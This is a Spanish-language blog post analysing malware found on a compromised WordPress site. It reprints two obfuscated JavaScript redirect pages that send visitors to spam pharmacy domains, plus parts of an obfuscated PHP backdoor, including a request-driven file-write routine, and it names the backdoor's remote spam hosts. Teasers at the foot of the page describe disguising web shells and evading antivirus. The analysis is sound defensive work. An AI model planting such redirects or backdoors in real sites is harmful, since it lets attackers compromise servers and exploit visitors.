SPAM en sitios web, generalmente que utilizan Wordpress - Análisis de Malware

Hace poco tuve que revisar el sitio web de un cliente, el trabajo era eliminar malware que estaba enviando mucho correo SPAM y también promocionando productos que claramente no era de su negocio o rubro.

Lo primero que vi cuando entré al servidor fue una larga lista de archivos HTML con nombres aleatorios, todos ellos promocionando productos extranjeros. Seguí revisando y encontré scripts en PHP, Javascript y Perl, es decir, estaba más que infectado.

Pero no quiero hablar sobre el trabajo de limpieza que tuve que hacer, sino del análisis de los distintos malwares instalados (que es una investigación personal, no estaba en el alcance del trabajo).

JS REDIRECT


Estas son dos muestras de la larga lista de archivos HTML, todos similares:

Muestra HTML 1 
<html> <head> 
 <title>thousands32761 Gaudiest - whatsoeer alert seemliness champion affright. Listend sense.</title>
  <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head> 
 <body> <script type="text/javascript"> 
 function blessed() { thank = particular * heeds; harlequin = boors - fierce; } 
 function severed() { setTimeout(fluc(),1034); } 
 severed(); 
 function norwaye(anorwaye) { return String.fromCharCode(anorwaye); } 
 function bandsa(aski) { return 3; } 
 function fluc() { afluc = bandsa(); bfluc = [122,108,113,103,114,122,49,119,114,115,49,111,114,102,100,119,108,114,113,49,107,117,104,105,64,42,107,119,119,115,61,50,50,106,104,113,104,117,108,102,100,108,103,103,104,100,111,49,118,120,42,62]; return traceb(afluc,bfluc); } 
 function born() { affright = resolved - lowly; disciplined = aver / highlands; latest = boors * seeking; }
 function traceb(atraceb,btraceb) { ctraceb = ""; for (dtraceb = 0; dtraceb < btraceb.length; dtraceb++) { etraceb = btraceb[dtraceb]; ftraceb = etraceb - atraceb; gtraceb = norwaye(ftraceb); ctraceb = ctraceb + gtraceb; } return ctraceb; } 
 function river(delighted,collapses) { brotherhood = force + striking; } 
 function shy() { beyond = dusky * confuse; } 
 function full() { tie = convinced * bleak; greetst = puzzled - amazing; } 
 </script> </body> </html>
Lo primero que se ejecuta es la función "severed();", que utiliza la rutina de Javascript SetTimeout para ejecutar "fluc()" luego de 1034 milisengundos.

fluc(), asigna a la variable "afluc" lo retornado por la función "bandsa()", en este caso "3". Posteriormente se pasa un arreglo de enteros llamado "bfluc" a la función "traceb", esta última función recorre cada uno de los elementos del array, le resta "afluc" que es 3, y obtiene el caracter usando "String.fromCharCode", generando como salida "window.top.location.href='http://genericaiddeal.su';" Una página para venta de Viagra.
Si observamos las demás funciones, usan variables que no están definidas, no hay valores asignados y nunca son utilizadas.

Muestra HTML 2 
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 <title>woe33040 Hair flaw missed beauty aver provokes. Pox - yellow behold beyond.</title>
 </head> <body> 
<script type="text/javascript"> 
function days() { cool = shy / record; seehis = barely / seen; full = bloodshed * missed; } 
function gaudiest() { rising = thread + wicked; flaw = main / seemingly; } 
function kerchiefplotsc() { akerchiefplotsc = nighttimea(); bkerchiefplotsc = [124,110,115,105,116,124,51,121,116,117,51,113,116,104,102,121,110,116,115,51,109,119,106,107,66,44,109,121,121,117,63,52,52,108,119,106,102,121,106,125,117,106,119,121,51,120,122,44,64]; 
return illnessthreeb(akerchiefplotsc,bkerchiefplotsc); } 
function twilld() { setTimeout(kerchiefplotsc(),1036); } 
function woe(tells,barelys) { short = ice - plotted; } 
function remains(bloodshed) { stand = flutterd - fatherly; soothe = needed + charms; inheritance = advance / nervous; } 
function nighttimea(chefi) { return 5; } 
twilld(); 
function godheadse(agodheadse) { return String.fromCharCode(agodheadse); } 
function striking() { hideandseek = resolved - gaze; ask = amazing * scheme; holiday = latest / complete; }
 function illnessthreeb(aillnessthreeb,billnessthreeb) { cillnessthreeb = ""; for (dillnessthreeb = 0; dillnessthreeb < billnessthreeb.length; dillnessthreeb++) { eillnessthreeb = billnessthreeb[dillnessthreeb]; fillnessthreeb = eillnessthreeb - aillnessthreeb; gillnessthreeb = godheadse(fillnessthreeb); cillnessthreeb = cillnessthreeb + gillnessthreeb; } return cillnessthreeb; } </script> </body> </html>

En este otro caso, es lo mismo, sólo que inicia a los 1036 milisegundos, el valor a restar a cada entero del array es "5", formando como resultado "window.top.location.href='http://greatexpert.su';", que es otro sitio de venta de Viagra.

Obviamente hay más sitios infectados con el mismo malware, que finalmente es un Javascript/Redirect - https://otx.alienvault.com/indicator/domain/macpopularinstall.com

PHP


Otra infección, fue la que encontré en el index.php de la raíz de Wordpress, la muestra la comparto en un link, porque el código es más extenso

https://github.com/inc0d3/malware/blob/master/spam/wp-index.php

El index original de Wordpres es:

https://github.com/WordPress/WordPress/blob/master/index.php

En la primera parte, define variables con nombres de funciones, armando el string a partir de los caracteres de un array, similar a lo que vimos con el JS Redirect:

$OO0_OO__00="s6l5cpd1eyuh3qo8nmkg-0bvi7xztw49r_fja2";
$O0_0__OO0O=$OO0_OO__00{5}.$OO0_OO__00{32}.$OO0_OO__00{8}....
Para finalmente formar el siguiente listado de variables: 
$O0_0__OO0O = "preg_replace_callback";
$O0OO0O___0 = "stream_socket_client";
$O00O0OO___ = "stream_get_meta_data";
$O_0_OO0_O0 = "stream_set_blocking";
$OOO0__0_O0 = "stream_set_timeout";
$O0_OO_0O0_ = "ignore_user_abort";
$O0O0__OO0_ = "file_put_contents";
$OO_0_OO00_ = "file_get_contents";
$O0OO_O_00_ = "http_build_query";
$O0O0__O_0O = "function_exists";
$O_O00__0OO = "error_reporting";
$OO_O000_O_ = "create_function";
$OO_O_000O_ = "set_time_limit";
$O0__OO0_0O = "gethostbyname";
$OO0_O0_0O_ = "base64_decode";
$O0O__O0O0_ = "preg_replace";
$O00O_O0__O = "str_replace";
$O0O0___0OO = "file_exists";
$O0__OO0O0_ = "curl_setopt";
$OO_OO0_00_ = "array_shift";
$O00_O_O0O_ = "preg_match";
$O0_0OOO_0_ = "curl_error";
$O__0O_O0O0 = "curl_close";
$O_O0_OO_00 = "urlencode";
$O00__O0OO_ = "parse_url";
$O_00O_OO_0 = "gzinflate";
$OO__0_00OO = "curl_init";
$OOO0_0__0O = "curl_exec";
$O_O0__0O0O = "is_array";
$OO__000O_O = "mt_rand";
$OOO0O0_0__ = "implode";
$O00O_O_O0_ = "explode";
$O_0O0O_0O_ = "dirname";
$O0_O_0_OO0 = "usleep";
$OO_0__0O0O = "unlink";
$OO0_O0__0O = "strstr";
$OO_0O_00_O = "strpos";
$O0_OO0_O0_ = "strlen";
$OOO__00O_0 = "hexdec";
$O_O_0O0_0O = "getenv";
$O_O_O_000O = "fwrite";
$O00_OO__0O = "fclose";
$O_O__O00O0 = "fread";
$O_O00OO__0 = "fgets";
$OO__0O_0O0 = "chmod";
$O0_0_O_0OO = "trim";
$O00_OO__O0 = "join";
$O__0_OOO00 = "feof";
$OO0___00OO = "date";

Luego, comienza a ejecutar código usando la variable GLOBALS de PHP, ya que todas las definiciones anteriores quedan en GLOBALS:
${"GLOBALS"}["O_O00__0OO"](0);
//equivalente a ejecutar: error_reporting(0)

No encontré herramientas para desofuscar este código, así que lo hice manualmente, quedando así:

https://github.com/inc0d3/malware/blob/master/spam/wp-index-desofuscado.php

Se trata de un backdoor en PHP, principalmente para promocionar SPAM.

[imagen 1]

Dentro de sus funciones, crea un archivo .htaccess:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

Para redirigir las peticiones del sitio a "index.php", luego revisa si cuenta con las funciones de "curl" para realizar peticiones web, si falla utiliza "streams", si falla utilizará "sockets" y por ultimo file_get_contents.

Las peticiones de esta muestra son dirigidas a

http://www0.divorceevent.com/jump99[.]php
http://www0.divorceevent.com/data99[.]php

Los scripts alojados en este sitio responden con código JavaScript o HTML con SPAM.

El malware despliega principalmente HTML con SPAM como la "imagen 1", también tiene la capacidad de descargar el HTML y dejarlo en un archivo, para que la misma victima promocione el SPAM. Puede crear un sitemap.xml para que los buscadores indexen los archivos con SPAM.

Lo más peligroso son sus funcionalidades para descargar y ejecutar código en el servidor víctima, con la rutina:

$O0_O0_O0O_=create_function('$OO0_0OO0__','
 $OO__OO0_00=isset($_REQUEST["xxxxxxxxxxxx_filename"])?$_REQUEST["xxxxxxxxxxxx_filename"]:\'\';
 $O_O_0O0O0_=isset($_REQUEST["xxxxxxxxxxxx_filecontent"])?$_REQUEST["xxxxxxxxxxxx_filecontent"]:\'\';
 if(file_exists($OO__OO0_00)){
  if(!unlink($OO__OO0_00)){
   echo "delete|error";
   exit();
  }
 }
 file_put_contents($OO__OO0_00,$O_O_0O0O0_,FILE_APPEND);
 echo $OO__OO0_00.\'|success\';'
);

Su código, a la fecha, no es detectado por los principales Antivirus

https://www.virustotal.com/gui/file/5215f30c11fbadf20c39c58e9c5aebd4055cf4d30bd0524a0cdb23dd424c3746/detection


Pronto una segunda parte de este post...

Bye




Comentarios

Publicar un comentario

Entradas populares de este blog

Desempaquetando Themida 2 (unpacking windows binary) - Análisis de Malware

Imagen
Comparto el mecanismo que me ha funcionado para desempacar los binarios protegidos con Themida 2. Para quienes no conocen Themida, se trata de un software comercial, cuyo objetivo es proteger los binarios de la ingeniería inversa, pensando en proteger a los fabricantes de software de la copia de sus códigos, impedir la generación de cracks o keygens para sus licencias, entre otros. Pero obviamente, esto también es aprovechado por los atacantes que escriben malware, ya que este mecanismo hace mucho más difícil el análisis de los investigadores. En el ejemplo que explico ahora, revisaré un troyano que comparto acá: https://github.com/inc0d3/malware/blob/master/windows/Trusteer.zip Para el análisis recomiendo usar Windows 7 32 bits con las herramientas de Flare: https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html Ejecuté el malware e inmediatamente surgió este error: Es porque tenía corriendo las utilidades Process Monitor y Proce
Leer más

Ocultando la web shell como una imagen (Apache + PHP)

Imagen
Iniciamos marzo con una técnica muy utilizada, se trata de ocultar una shell que hemos subido a nuestro servidor objetivo, ocultarla 100% no será posible, pero si pasará desapercibida para muchos administradores y webmasters. La técnica consiste en que nuestro script (PHP en este caso) se oculte bajo una supuesta imagen. Primero, se asume que detectamos una vulnerabilidad que nos permita crear un archivo en el servidor, luego explotamos la vulnerabilidad y subimos nuestra shell, supongamos un plugin de Wordpress que hace upload de imagenes sin validar. Podríamos ver un directorio similar a este: Lo que vemos, es claramente un script PHP, debe mantener esa extensión para que el servidor lo interprete, lo ejecute y podamos hacer uso de este. El problema es que es demasiado evidente que se ha vulnerado la aplicación, entonces se hace necesario ocultar o camuflar esta intrusión de alguna forma. Apache permite sobre escribir algunas configuraciones a través de un archivo qu
Leer más

Evasión de antivirus modernos usando Process Injection - MITRE T1055

Imagen
  En octubre de este año revisé algunas técnicas comunes de inyección de shellcode en otros procesos, también conocido como Process Injection y puse a prueba algunos antivirus, me hubiese gustado probar más, pero por tiempo no pude. Me sorprendió que siendo técnicas conocidas y sin ofuscación alguna lograra evadir varios antivirus.  Si bien esto lo hago con el propósito de aprender y poner a prueba algunas marcas (a todas les reporté esto), deja en evidencia lo que siempre decimos, que no debemos descansar en "cajas" ni en productos de seguridad si no que deben ser parte de una cadena de mecanismos de protección (protección por capas, partiendo por la capa 8). Incluye el código fuente por si quieres poner a prueba tu antivirus.
Leer más